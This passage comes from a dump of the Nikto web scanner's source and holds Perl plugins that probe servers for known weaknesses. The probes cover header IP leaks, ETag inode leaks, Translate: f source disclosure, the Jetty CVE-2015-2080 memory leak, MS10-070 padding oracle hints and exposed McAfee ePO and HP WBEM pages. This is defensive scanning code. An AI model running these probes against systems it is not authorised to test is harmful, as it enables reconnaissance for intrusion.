Queued: $hostdesc:$1\");\n                push(@results, $hostdesc . \"_\" . $1);\n            }\n        }\n        else {\n            # just add it to the list\n            push(@results, $_);\n        }\n    }\n    close(IN);\n    return (@results);\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_headers.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: General HTTP headers checks\n###############################################################################\nuse vars qw/$HEADERSDB/;\n\nsub nikto_headers_init {\n    my $id = {\n        name        => \"headers\",\n        full_name   => \"HTTP Headers\",\n        author      => \"Sullo\",\n        description => \"Performs various checks against the headers returned from an HTTP request.\",\n        hooks       => {\n                   scan      => { method => \\&nikto_headers, },\n                   postfetch => { method => \\&nikto_headers_postfetch, },\n                   start     => { method => \\&nikto_headers_load, },\n                   },\n        copyright => \"2008 Chris Sullo\"\n        };\n\n    # some global variables\n    use vars qw/%ETAGS %BREACH %HEADERS_FOUND/;\n\n    return $id;\n}\n\nsub nikto_headers_load {\n    $HEADERSDB = init_db(\"db_headers_common\");\n}\n\nsub nikto_headers_postfetch {\n    my ($mark, $parameters, $request, $response) = @_;\n    return if $mark->{'terminate'};\n\n    # Skip OPTIONS\n    return if $request->{'whisker'}{'method'} eq \"OPTIONS\";\n\n    # These headers are very common but unlikely to be useful, so we can quickly skip them\n    my %skip_headers = map { $_ => 1 } qw(\n      whisker\n      date\n      content-type\n      content-length\n      connection\n      x-mod-pagespeed\n      x-page-speed\n      set-cookie\n      );\n\n    # look for internal IPs\n    foreach my $header (keys %$response) {\n        next\n          if exists $skip_headers{$header}\n          || exists $HEADERS_FOUND{ $mark->{hostname} }{ $mark->{port} }{$header};\n\n        # Check for known headers\n        nikto_headers_check($mark, $response, $header, 999986, $request);\n        my $header_value = $response->{$header};\n\n        # Do not check the Location header's path target for internal IPs\n        if ($header eq 'location') {\n            if ($header_value =~ /^\\//) {\n                next;\n            }\n            else {\n                my @uri_parts = LW2::uri_split($header_value);\n\n                # reconstruct without path/query/fragment\n                $header_value = $uri_parts[2];\n            }\n\n            # Is it what we scanned?\n            if (defined $header_value\n                && (   $header_value eq $mark->{'ip'}\n                    || (defined $mark->{'vhost'}       && $header_value eq $mark->{'vhost'})\n                    || (defined $mark->{'hostname'}    && $header_value eq $mark->{'hostname'})\n                    || (defined $mark->{'displayname'} && $header_value eq $mark->{'displayname'}))\n                    ) {\n                next;\n            }\n        }\n\n        foreach my $ip (get_ips($header_value)) {\n            my ($valid, $internal, $loopback) = is_ip($ip);\n            if ($valid && !$loopback) {\n                if ($ip ne $mark->{'ip'}) {\n\n                    # is it an internal, or just different?\n                    my $msg;\n                    $msg .= $request->{'whisker'}{'uri'} . \": \";\n                    if ($internal) { $msg .= \"RFC-1918 \"; }\n                    $msg .= \"IP address found in the '$header' header. The IP is \\\"$ip\\\".\";\n                    add_vulnerability(\n                        $mark,\n                        $msg,\n                        999979,\n                        \"https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed\",\n                        $request->{'whisker'}->{'method'},\n                        $request->{'whisker'}->{'uri'},\n                        $request,\n                        $response\n                        );\n                    $HEADERS_FOUND{ $mark->{hostname} }{ $mark->{port} }{$header} = 1;\n                }\n            }\n        }\n    }\n\n    # look for inode in etag header\n    if (  !defined $ETAGS{ $mark->{hostname} }{ $mark->{port} }\n        && defined $response->{'etag'}\n        && $response->{'etag'} =~ m/-/) {\n        my $etag = $response->{'etag'};\n        $etag =~ s/\"//g;\n        my @fields = split(\"-\", $etag);\n\n        # Only report ETags which actually leak inodes...\n        if (scalar(@fields) == 3) {\n            my $message =\n                $request->{'whisker'}{'uri'}\n              . \": Server may leak inodes via ETags, header found with file \"\n              . $request->{'whisker'}->{'uri'};\n\n            # check for numbers that are too large\n            my $ishex = 1;\n            for (my $i = 0 ; $i < 3 ; $i++) {\n                if ((length($fields[$i]) > 14) || ($fields[$i] !~ /^[0-9A-F]+$/i)) {\n                    $ishex = 0;\n                }\n            }\n            use bignum;\n            my ($inode, $size, $mtime, $ltime);\n            if ($ishex) {\n                $inode = \"0x$fields[0]\";\n                $size  = \"0x$fields[1]\";\n                $mtime = \"0x$fields[2]\";\n                $ltime = substr(sprintf(\"%s\", hex($mtime)), 0, 10);\n            }\n            else {\n                $inode = $fields[0];\n                $size  = $fields[1];\n                $mtime = $ltime = $fields[2];\n            }\n\n            $message .=\n              ($ishex == 1)\n              ? sprintf(\", inode: %d, size: %d, mtime: %s\",\n                        hex($inode), hex($size), scalar(localtime($ltime)))\n              : sprintf(\", inode: %s, size: %s, mtime: %s\", $inode, $size, $mtime);\n            add_vulnerability($mark, $message, 999984, \"CVE-2003-1418\",\n                              $request->{'whisker'}->{'method'},\n                              $request->{'whisker'}->{'uri'},\n                              $request, $response);\n            $ETAGS{ $mark->{hostname} }{ $mark->{port} } = 1;\n        }\n    }\n\n    if (defined $response->{'link'}\n        && !$HEADERS_FOUND{ $mark->{hostname} }{ $mark->{port} }{'link'}) {\n        my $values = report_multiheaders($response->{'link'});\n        add_vulnerability(\n                    $mark,\n                    $request->{'whisker'}{'uri'} . \": Link header(s) found with value(s): $values.\",\n                    \"000427\",\n                    \"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Link\",\n                    $request->{'whisker'}->{'method'},\n                    $request->{'whisker'}->{'uri'},\n                    $request,\n                    $response\n                    );\n        $HEADERS_FOUND{ $mark->{hostname} }{ $mark->{port} }{'link'} = 1;\n    }\n\n    # Look for any uncommon headers\n    foreach my $header (keys %$response) {\n        next\n          if defined $HEADERS_FOUND{ $mark->{'hostname'} }{ $mark->{'port'} }{\"uncommon-$header\"};\n\n        my $found = 0;\n        foreach my $st_header (@$HEADERSDB) {\n            if ($header eq $st_header->{'header'}) {\n                $found = 1;\n                last;\n            }\n        }\n        if ($found == 0) {\n            my $x = $response->{$header};\n            $x =~ s/\\s+.*$//;\n            $mark->{'components'}->{$x} = 1;\n            my $values = report_multiheaders($response->{$header});\n            $vuln = $request->{'whisker'}{'uri'}\n              . \": Uncommon header(s) '$header' found, with contents: $values.\";\n            add_vulnerability($mark, $vuln, 999100, \"\",\n                              $request->{'whisker'}->{'method'},\n                              $request->{'whisker'}->{'uri'},\n                              $request, $response);\n            $HEADERS_FOUND{ $mark->{'hostname'} }{ $mark->{'port'} }{\"uncommon-$header\"} = 1;\n        }\n    }\n\n    # Strict-Transport-Security\n    if (   $mark->{'ssl'}\n        && !$HEADERS_FOUND{ $mark->{hostname} }{ $mark->{port} }{'strict-transport-security'}\n        && defined $response) {\n        if ($response->{'strict-transport-security'} =~ /max-age=\"?0\"?/i) {\n            add_vulnerability(\n                $mark,\n                $request->{'whisker'}{'uri'}\n                  . \": The site uses TLS and the Strict-Transport-Security HTTP header is set with max-age=0, which effectively disables it.\",\n                999971,\n                \"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security\",\n                $request->{'whisker'}->{'method'},\n                $request->{'whisker'}->{'uri'},\n                $request,\n                $response\n                );\n        }\n\n        $HEADERS_FOUND{ $mark->{hostname} }{ $mark->{port} }{'strict-transport-security'} = 1;\n    }\n\n    # Alt-Svc (HTTP/3)\n    if (!$HEADERS_FOUND{ $mark->{hostname} }{ $mark->{port} }{'alt-svc'}\n        && defined $response->{'whisker'}->{'code'}) {\n        if (defined $response->{'alt-svc'}) {\n            my ($protocol, $msg);\n            $response->{'alt-svc'} =~ /.*(h[23])=\"([^\"]+)\"/;\n            my $endpoint = $2;\n            if ($1 eq \"h2\") {\n                $protocol = \"HTTP/2 over TLS\";\n            }\n            elsif ($1 eq \"h2c\") {\n                $protocol = \"HTTP/2 over TCP\";\n                $msg      = \" Unencrypted.\";\n            }\n            elsif ($1 eq \"h3\") {\n                $protocol = \"HTTP/3\";\n                $msg      = \" Nikto cannot test HTTP/3 over QUIC.\";\n            }\n            else {\n                $protocol = $1;\n            }\n\n            add_vulnerability(\n                $mark,\n                $request->{'whisker'}{'uri'}\n                  . \": An alt-svc header was found which is advertising $protocol. The endpoint is: '$endpoint'.$msg\",\n                \"011799\",\n                \"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/alt-svc\",\n                $request->{'whisker'}->{'method'},\n                $request->{'whisker'}->{'uri'},\n                $request,\n                $response\n                );\n            $HEADERS_FOUND{ $mark->{hostname} }{ $mark->{port} }{'alt-svc'} = 1;\n        }\n    }\n\n    # x-clacks-overhead\n    if (!$HEADERS_FOUND{ $mark->{hostname} }{ $mark->{port} }{'x-clacks-overhead'}\n        && defined $response->{'whisker'}->{'code'}) {\n        if (defined $response->{'x-clacks-overhead'}) {\n            add_vulnerability(\n                $mark,\n                $request->{'whisker'}{'uri'}\n                  . \": There appears to be Clacks Overhead on the server and the message is: $response->{'x-clacks-overhead'}\",\n                999104,\n                \"https://xclacksoverhead.org/home/about\",\n                $request->{'whisker'}->{'method'},\n                $request->{'whisker'}->{'uri'},\n                $request,\n                $response\n                );\n            $HEADERS_FOUND{ $mark->{hostname} }{ $mark->{port} }{'x-clacks-overhead'} = 1;\n        }\n    }\n\n    # CSP Report URLs\n    if (!$HEADERS_FOUND{ $mark->{hostname} }{ $mark->{port} }{'report-uri'}\n        && defined $response->{'whisker'}->{'code'}) {\n        if (defined $response->{'report-uri'}) {\n            add_vulnerability(\n                $mark,\n                $request->{'whisker'}{'uri'}\n                  . \": A CSP report-uri header was found. The URL is: $response->{'report-uri'}\",\n                000433,\n                \"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/report-uri\",\n                $request->{'whisker'}->{'method'},\n                $request->{'whisker'}->{'uri'},\n                $request,\n                $response\n                );\n            $HEADERS_FOUND{ $mark->{hostname} }{ $mark->{port} }{'report-uri'} = 1;\n        }\n    }\n\n    # Cloudflare\n    if (   !$HEADERS_FOUND{ $mark->{hostname} }{ $mark->{port} }{'cf-ray'}\n        && defined $response->{'cf-ray'}\n        && !$CLI{'useproxy'}) {\n        add_vulnerability(\n            $mark,\n            $request->{'whisker'}{'uri'}\n              . \": Cloudflare detected via cf-ray header. Recommend proxying via Burp or mitmproxy to avoid TLS fingerprint blocks.\",\n            999106,\n            \"https://github.com/sullo/nikto/wiki/Using-a-Proxy\",\n            $request->{'whisker'}->{'method'},\n            $request->{'whisker'}->{'uri'},\n            $request,\n            $response\n            );\n        $HEADERS_FOUND{ $mark->{hostname} }{ $mark->{port} }{'cf-ray'} = 1;\n    }\n\n    return $request, $response;\n}\n\n# If multiple headers were sent with the same name, turn the array into a string for reporting\nsub report_multiheaders {\n    my $header = $_[0] || return;\n    if (ref($header) eq 'ARRAY') {\n        return join(',', @{$header});\n    }\n    else {\n        return $header;\n    }\n}\n\nsub nikto_headers_check {\n    my ($mark, $response, $header, $tid, $request) = @_;\n    return if $mark->{'terminate'};\n    my @interesting_headers = split(\" \", $VARIABLES{'@INTERESTING_HEADERS'});\n\n    foreach my $header (@interesting_headers) {\n        if (exists $response->{$header}) {\n            if (!exists $HEADERS_FOUND{ $mark->{'hostname'} }{ $mark->{'port'} }\n                {\"interesting-$header\"}) {\n                my $value = \"\";\n                if (ref($response->{$header}) eq ARRAY) {\n                    $value = join(', ', @{ $response->{$header} });\n                }\n                else {\n                    $value = $response->{$header};\n                }\n                $HEADERS_FOUND{ $mark->{'hostname'} }{ $mark->{'port'} }{\"interesting-$header\"} = 1;\n                add_vulnerability(\n                                $mark,\n                                $request->{'whisker'}{'uri'} . \": Retrieved $header header: $value\",\n                                $tid,\n                                \"\",\n                                $request->{'whisker'}->{'method'},\n                                $request->{'whisker'}->{'uri'},\n                                $request,\n                                $response\n                                );\n            }\n        }\n    }\n}\n\nsub nikto_headers {\n    my ($mark) = @_;\n    return if $mark->{'terminate'};\n\n    #######################################################################\n    # look for to see whether its vulnerable to the Translate: f\n    my %transheaders;\n    $transheaders{'Translate'} = \"f\";\n    foreach\n      my $f (qw/\\/index.asp \\/njkk999.asp \\/index.aspx \\/jkl988.aspx \\/login.asp \\/login.aspx/) {\n        return if $mark->{'terminate'};\n        my ($res, $content, $error, $request, $response) =\n          nfetch($mark, $f, \"GET\", \"\", \"\", \"\", \"Headers\");\n        if ($res eq \"200\") {\n            ($res, $content, $error, $request, $response) =\n              nfetch($mark, $f . \"\\\\\", \"GET\", \"\", \\%transheaders, \"\", \"Headers\");\n            if ($res eq \"200\") {\n                if ($content =~ /<asp:/ || $content =~ /<\\/asp:/) {\n                    add_vulnerability(\n                        $mark,\n                        $request->{'whisker'}{'uri'}\n                          . \": Host may be vulnerable to a source disclosure using the Translate: header\",\n                        999983,\n                        \"CVE-2000-0778\",\n                        \"GET\",\n                        $f,\n                        $request,\n                        $response\n                        );\n                    last;\n                }\n            }\n        }\n    }\n\n    #######################################################################\n    # Content-Location header in IIS\n    my (%locheaders, %locflags, $cl, $l, $wa, $rt);\n    $locheaders{'User-Agent'} = get_ua();\n    $locflags{'noclean'}      = 1;\n    $locflags{'nohost'}       = 1;\n    $cl                       = $l = $wa = $rt = 0;\n\n    foreach my $uri ('/',                              '/images',\n                     '/Autodiscover/Autodiscover.xml', '/Autodiscover/',\n                     '/Microsoft-Server-ActiveSync',   '/Microsoft-Server-ActiveSync/default.css',\n                     '/ECP',                           '/EWS',\n                     '/EWS/Exchange.asmx',             '/Exchange',\n                     '/OWA',                           '/Microsoft-Server-ActiveSync/default.eas',\n                     '/Rpc',                           '/EWS/Services.wsdl',\n                     '/ecp',                           '/OAB',\n                     '/aspnet_client',                 '/PowerShell'\n                     ) {\n\n        return if $mark->{'terminate'};\n\n        my ($res, $content, $errors, $request, $response) =\n          nfetch($mark, $uri, \"GET\", \"\", \\%locheaders, \\%locflags, \"Headers\", \"1.0\");\n\n        if (!$cl && ($response->{'content-location'} ne \"\")) {\n            my @ips = get_ips($response->{'content-location'});\n            my ($valid, $internal, $loopback) = is_ip($ips[0]);\n            if (($ips[0] ne '') && ($ips[0] ne $mark->{'ip'})) {\n                $cl = 1;\n                add_vulnerability(\n                    $mark,\n                    $uri\n                      . \": IIS may reveal its internal or real IP in the Content-Location header via a request with HTTP/1.0. The value is \\\"$ips[0]\\\".\",\n                    999989,\n                    \"CVE-2000-0649\",\n                    \"GET\",\n                    $uri,\n                    $request,\n                    $response\n                    );\n            }\n        }\n\n        if (!$l && ($response->{'location'} ne \"\")) {\n            my @ips = get_ips($response->{'location'});\n            my ($valid, $internal, $loopback) = is_ip($ips[0]);\n            if (($ips[0] ne '') && ($ips[0] ne $mark->{'ip'})) {\n                $l = 1;\n                add_vulnerability(\n                    $mark,\n                    $uri\n                      . \": The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is \\\"$ips[0]\\\".\",\n                    999988,\n                    \"CVE-2000-0649\",\n                    \"GET\",\n                    $uri,\n                    $request,\n                    $response\n                    );\n            }\n        }\n\n        if (!$wa && ($response->{'www-authenticate'} ne \"\")) {\n            my @ips = get_ips($response->{'www-authenticate'});\n            my ($valid, $internal, $loopback) = is_ip($ips[0]);\n            if (($ips[0] ne '') && ($ips[0] ne $mark->{'ip'})) {\n                $wa = 1;\n                add_vulnerability(\n                    $mark,\n                    $request->{'whisker'}{'uri'}\n                      . \": Microsoft Exchange Systems (CAS and OWA) may reveal the internal or real IP in the WWW-Authenticate header via a request to $uri over HTTP/1.0. The value is \\\"$ips[0]\\\".\",\n                    999986,\n                    \"CVE-2000-0649\",\n                    \"GET\",\n                    $uri,\n                    $request,\n                    $response\n                    );\n            }\n        }\n\n        if (!$rt && ($response->{'report-to'} ne \"\")) {\n            my @bits = split(\"url\\\": \\\"\", $response->{'report-to'});\n            my $have = 0;\n            my @urls;\n            foreach my $b (@bits) {\n                next if $b !~ /^http/;\n                $b =~ s/\\\".*$//;\n                if ($b ne \"\") {\n                    push(@urls, $b);\n                    $have = $rt = 1;\n                }\n            }\n            if ($have) {\n                add_vulnerability(\n                    $mark,\n                    $request->{'whisker'}{'uri'}\n                      . \": A CSP report-to header was found with the following URLs: \"\n                      . join(\", \", @urls),\n                    999945,\n                    \"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/report-to\",\n                    \"GET\",\n                    $uri,\n                    $request,\n                    $response\n                    );\n            }\n        }\n\n        if ($cl && $l && $wa && $rt) { last; }\n    }\n\n    #######################################################################\n    # Location header in WebLogic\n    # Clear out locheaders\n    for (keys %locheaders) {\n        delete $locheaders{$_};\n    }\n    $locheaders{'User-Agent'} = get_ua();\n\n    ($res, $content, $errors, $request, $response) =\n      nfetch($mark, '.', \"GET\", \"\", \\%locheaders, \\%flags, \"Headers\", \"1.0\");\n\n    my @ips = get_ips($response->{'location'});\n    if ($ips[0] ne '') {\n        my ($valid, $internal, $loopback) = is_ip($ips[0]);\n        if ($valid && !$loopback && ($ips[0] ne $mark->{'ip'})) {\n            my $msg = $request->{'whisker'}{'uri'} . \": WebLogic may reveal \";\n            if   ($internal) { $msg .= \"an RFC-1918 IP address. \"; }\n            else             { $msg .= \"a different IP address in the Location header.\"; }\n            $msg .= \"The IP is \\\"$ips[0]\\\".\";\n            add_vulnerability(\n                $mark,\n                $msg,\n                999987,\n                \"https://web.archive.org/web/20080821223545/http://archives.neohapsis.com/archives/bugtraq/2003-04/0034.html\",\n                \"GET\",\n                \".\",\n                $request,\n                $response\n                );\n        }\n    }\n\n    #######################################################################\n    # BREACH Checks\n    for (keys %locheaders) {\n        delete $locheaders{$_};\n    }\n\n    $locheaders{'User-Agent'}      = get_ua();\n    $locheaders{'Accept-Encoding'} = \"deflate, gzip\";\n    ($res, $content, $errors, $request, $response) =\n      nfetch($mark, '/', \"GET\", \"\", \\%locheaders, \\%flags, \"Headers\", \"1.1\");\n\n    if (!$BREACH && defined $response && $mark->{'ssl'}) {\n        if (defined $response->{'content-encoding'}) {\n            if ($response->{'content-encoding'} =~ \"(deflate|gzip)\") {\n                $BREACH = 1;\n                add_vulnerability(\n                    $mark,\n                    $request->{'whisker'}{'uri'}\n                      . \": The Content-Encoding header is set to \\\"deflate\\\" which may mean that the server is vulnerable to the BREACH attack.\",\n                    999966,\n                    \"http://breachattack.com/\",\n                    $request->{'whisker'}->{'method'},\n                    $request->{'whisker'}->{'uri'},\n                    $request,\n                    $response\n                    );\n            }\n        }\n    }\n\n    #######################################################################\n    # Jetty CVE-2015-2080\n    for (keys %locheaders) {\n        delete $locheaders{$_};\n    }\n    $locheaders{'User-Agent'} = get_ua();\n    $locheaders{'Nikto'}      = \"\\\\x1f\";\n\n    ($res, $content, $errors, $request, $response) =\n      nfetch($mark, '/', \"GET\", \"\", \\%locheaders, \\%flags, \"Headers\", \"1.0\");\n\n    if (($res eq \"400\") && ($response->{'whisker'}->{'message'} =~ /x1f<<</)) {\n        add_vulnerability(\n            $mark,\n            $request->{'whisker'}{'uri'}\n              . \": Jetty > 9.2.3 and < 9.2.9 may reveal the contents of internal memory if illegal characters are passed.\",\n            \"000477\",\n            \"CVE-2015-2080\",\n            \"GET\",\n            \".\",\n            $request,\n            $response\n            );\n    }\n\n    #######################################################################\n    # Missing suggested headers\n    ($res, $content, $errors, $request, $response) =\n      nfetch($mark, '/', \"GET\", \"\", {}, {}, \"Headers\", \"1.1\");\n\n    while (my ($header, $ref) = each %{ $VARIABLES->{'SUGGESTED_HEADERS'} }) {\n        if (!exists $response->{$header}) {\n            add_vulnerability($mark,\n                   $request->{'whisker'}{'uri'} . \": Suggested security header missing: \" . $header,\n                   \"013587\", $ref, \"GET\", \"/\", $request, $response);\n        }\n    }\n}\n1;\n"
  },
  {
    "path": "program/plugins/nikto_ms10_070.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Determine if site is vulnerable to MS10-070\n###############################################################################\nuse vars qw/%MS10070/;\n\nsub nikto_ms10_070_init {\n    my $id = { name        => \"ms10_070\",\n               full_name   => \"ms10-070 Check\",\n               author      => \"Sullo\",\n               description => \"Determine if a site is vulnerable to MS10-070\",\n               hooks       => {\n                          postfetch => { method => \\&nikto_ms10_070,\n                                         weight => 20,\n                                         },\n                            },\n               copyright => \"2013 Chris Sullo\"\n               };\n\n    return $id;\n}\n\nsub nikto_ms10_070 {\n    my ($mark, $parameters, $request, $response) = @_;\n    return if $mark->{'terminate'};\n    return if $mark->{'ms100707'};\n    my $method = $response->{'whisker'}->{'method'} || \"GET\";\n\n    while ($response->{'whisker'}->{'data'} =~ /\\.axd\\?d=([^\\?;&\\s\"']+)/ig) {\n        return if $mark->{'terminate'};\n        my $string = $1;\n        next if $MS10070{$string};\n        $MS10070{$string} = 1;\n        $string =~ s/\\-/\\+/g;\n        $string =~ s/\\_/\\//g;\n        next if $string eq '';\n        my $count = chop($string);\n        $string = $string . (\"=\" x int($count));\n        $string = LW2::decode_base64($string);\n\n        if ((length($string) % 8) == 0) {\n            $mark->{'ms100707'} = 1;\n            add_vulnerability(\n                $mark,\n                \"Server may be vulnerable to MS10-070 (based on numeric calculation) and thus may allow a cryptographic padding oracle. This vulnerability must be manually validated.\",\n                999959,\n                \"http://blog.gdssecurity.com/labs/2010/9/14/automated-padding-oracle-attacks-with-padbuster.html\",\n                $method,\n                $response->{'whisker'}->{'uri'},\n                $request,\n                $response\n                );\n        }\n    }\n\n    return $request, $response;\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_msgs.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Various messages relating to the server banner\n###############################################################################\n# NOTES:\n# versions are loaded from the \"db_server_msgs\" file, which should be in the\n# plugins directory this plugin checks the server version to see if there are\n# any version specific items in the db_server_msgs this differs from\n# nikto_outdated because that is ONLY checking to see if it is an old version,\n# whereas this checks to see if the versions match\n###############################################################################\nsub nikto_msgs_init {\n    my $id = { name        => \"msgs\",\n               full_name   => \"Server Messages\",\n               author      => \"Sullo\",\n               description => \"Checks the server version against known issues.\",\n               hooks       => {\n                          scan => { method => \\&nikto_msgs,\n                                    weight => 5,\n                                    },\n                            },\n               copyright => \"2008 Chris Sullo\"\n               };\n    return $id;\n}\n\nsub nikto_msgs {\n    my ($mark) = @_;\n    return if $mark->{'terminate'};\n    my $dbarray;\n    $dbarray = init_db(\"db_server_msgs\");\n\n    foreach my $item (@$dbarray) {\n        $item->{'server'} = validate_and_fix_regex($item->{'server'});\n        if ($mark->{'banner'} =~ /($item->{'server'})\\b/i) {\n            add_vulnerability($mark, \"/: $1 - $item->{'message'}\",\n                              $item->{'nikto_id'}, $item->{'refs'});\n        }\n    }\n\n    # Special stuff to pull information from results\n    # McAfee ePO\n    if ($mark->{'banner'} =~ /Agent-ListenServer-HttpSvr\\/1\\.0\\b/i) {\n        my ($res, $content, $error, $request, $response) =\n          nfetch($mark, \"/_LOGFILENAME_\", \"GET\", \"\", \"\", \"\", \"msgs: Agent-ListenServer-HttpSvr\");\n        return unless ($res == 200);\n\n        # Computer name\n        return if $mark->{'terminate'};\n        if ($content =~ /ComputerName/) {\n            my $name = $content;\n            $name =~ s#(^.*<ComputerName>)([^<]+)(</ComputerName>.*$)#$2#;\n            my $eposerver = $content;\n            $eposerver =~ s#(^.*<ePOServerName>)([^<]+)(</ePOServerName>.*$)#$2#;\n            add_vulnerability(\n                $mark,\n                \"/_LOGFILENAME_: Web server is a McAfee ePO agent and showing the hostname as '$name' and the ePO server(s) as '$eposerver'.\",\n                980100,\n                \"https://www.mcafee.com/enterprise/en-us/downloads/trials/epo-mcafee-agent-deployment.html\",\n                \"GET\",\n                \"/_LOGFILENAME_\",\n                $request,\n                $response\n                );\n        }\n        else {\n            add_vulnerability(\n                $mark,\n                \"/_LOGFILENAME_: Web server is a McAfee ePO agent.\",\n                000435,\n                \"https://www.mcafee.com/enterprise/en-us/downloads/trials/epo-mcafee-agent-deployment.html\",\n                \"GET\",\n                \"/_LOGFILENAME_\",\n                $request,\n                $response\n                );\n        }\n    }\n\n    # HP WBEM\n    if ($mark->{'banner'} =~ /CompaqHTTPServer/i) {\n        ($res, $content, $error, $request, $response) =\n          nfetch($mark, \"/cpqlogin.htm\", \"GET\", \"\", \"\", \"\", \"msgs: CompaqHTTPServer\");\n        return unless ($res == 200);\n        return if $mark->{'terminate'};\n        my $ipaddrs = \"\";\n        my $name;\n        foreach my $line (split(/\\n/, $content)) {\n            if ($line =~ \"System Management Homepage for \") {\n                $name = $line;\n                $name =~ s#(^.*System Management Homepage for )([a-zA-Z0-9]*)(</font>.*$)#$2#;\n            }\n            if ($line =~ \"new ObjectIpAddresses\") {\n                my $ipaddr = $line;\n                $ipaddr =~ s#(^.*new ObjectIpAddresses\\(\")([\\d\\.]+)(\"\\);.*$)#$2#;\n                nprint(\"$ipaddr\", \"\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n                $ipaddrs .= \" $ipaddr\";\n            }\n        }\n        add_vulnerability(\n            $mark,\n            \"/cpqlogin.htm: Web server is an HP WBEM agent and showing the hostname is $name and the IP addresses are $ipaddrs.\",\n            801010,\n            \"\",\n            \"GET\",\n            \"/cpqlogin.htm\",\n            $request,\n            $response\n            );\n    }\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_multiple_index.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Look for multiple unique index files\n###############################################################################\nsub nikto_multiple_index_init {\n    my $id = { name        => \"multiple_index\",\n               full_name   => \"Multiple Index\",\n               author      => \"Tautology\",\n               description => \"Checks for multiple index files\",\n               hooks       => { scan => { method => \\&nikto_multiple_index, }, },\n               copyright   => \"2009 Chris Sullo\"\n               };\n\n    return $id;\n}\n\nsub nikto_multiple_index {\n    my ($mark) = @_;\n    my $dbarray = init_db(\"db_multiple_index\");\n    my ($found, $hashes);\n    foreach my $item (@$dbarray) {\n        return if $mark->{'terminate'};\n\n        # Get file\n        my ($res, $content, $error, $request, $response) =\n          nfetch($mark, \"/$item->{'index'}\", \"GET\", \"\", \"\", \"\", \"multiple_index\");\n\n        if ($res == 200) {\n            $content = rm_active_content($content, \"$mark->{'root'}/$item->{'index'}\");\n            my $hash = LW2::md5($content);\n            $found{\"$mark->{'root'}/$item->{'index'}\"} = $hash;\n            $hashes{$hash}++;\n        }\n\n    }\n\n    my $count = keys(%found);\n    if ($count > 1) {\n\n        # make sure we have unique pages\n        my $total_unique = grep { $hashes{$_} == 1 } keys %hashes;\n\n        # one unique hash... bogus responses\n        if ($total_unique <= 1) {\n            return;\n        }\n        my $file_list = join(', ', keys %found);\n\n        my $msg = \"Multiple index files found\";\n        if ($total_unique < $count) {\n            $msg .= \" (may not all be unique)\";\n        }\n        else {\n            $msg .= \" (all unique)\";\n        }\n        add_vulnerability($mark, \"$msg: $file_list\", \"740000\", \"\", \"GET\", \"/\", $request, $response);\n    }\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_negotiate.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Check for mod_negotiation indexing\n###############################################################################\n\nsub nikto_negotiate_init {\n    my $id = { name        => \"negotiate\",\n               full_name   => \"Negotiate\",\n               author      => \"Sullo\",\n               description => \"Checks the mod_negotiation MultiViews.\",\n               copyright   => \"2013 Chris Sullo\",\n               hooks       => { scan => { method => \\&nikto_negotiate, }, },\n               };\n    return $id;\n}\n\nsub nikto_negotiate {\n    my ($mark) = @_;\n    return if $mark->{'terminate'};\n    my %headers = ('Accept', 'application/whatever; q=1.0');\n\n    my ($res, $content, $error, $request, $response) =\n      nfetch($mark, \"/index\", \"GET\", \"\", \\%headers, \"\", \"negotiate\");\n\n    if ($response->{'alternates'} =~ /\\{\\\"/) {\n        my $message =\n          \"/index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: \";\n        my @alts = split(/,/, $response->{'alternates'});\n        foreach my $h (@alts) {\n            $h =~ /\\s?\\{\"([^\"]+)\"/;\n            $message .= $1 . \", \";\n        }\n        $message =~ s/, $//;\n\n        add_vulnerability(\n            $mark,\n            $message,\n            999965,\n            \"http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275\",\n            GET,\n            \"/index\",\n            $request,\n            $response\n            );\n    }\n\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_options.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: HTTP options check\n###############################################################################\nsub nikto_options_init {\n    my $id = { name        => \"httpoptions\",\n               full_name   => \"HTTP Options\",\n               author      => \"Sullo\",\n               description =>\n                 \"Performs a variety of checks against the HTTP options returned from the server.\",\n               hooks => { scan => { method => \\&nikto_httpoptions,\n                                    weight => 20,\n                                    },\n                            },\n               copyright => \"2008 Chris Sullo\"\n               };\n    return $id;\n}\n\n# This just gets the HTTP options & checks 'em out.\n# See RFC 2626 for more info...\n\nsub nikto_httpoptions {\n    my ($mark) = @_;\n    return if $mark->{'terminate'};\n    my (%request, %response, $dbarray, $txt, $allow_methods, $public_methods);\n    my $junkmethodresp;\n    $txt     = \"\";\n    $dbarray = init_db(\"db_options\");\n\n    # test for both OPTIONS / and OPTIONS * as they may give different results\n    # my ($res, $content, $errors, $request, $response) =\n    # nfetch($mark, \"*\", \"OPTIONS\", \"\", \"\", \"\", \"httpoptions: OPTIONS *\");\n\n    # my $aoptions = \"$response->{'allow'}, \";\n    # my $poptions = \"$response->{'public'}, \";\n\n    ($res, $content, $errors, $request, $response) =\n      nfetch($mark, \"/\", \"OPTIONS\", \"\", \"\", \"\", \"httpoptions: OPTIONS /\");\n    $aoptions .= $response->{'allow'};\n    $poptions .= $response->{'public'};\n\n    foreach my $o (split(/,[ ]?/, $aoptions)) {\n        $allow_methods .= \", $o\" unless ($allow_methods =~ /\\b$o\\b/ 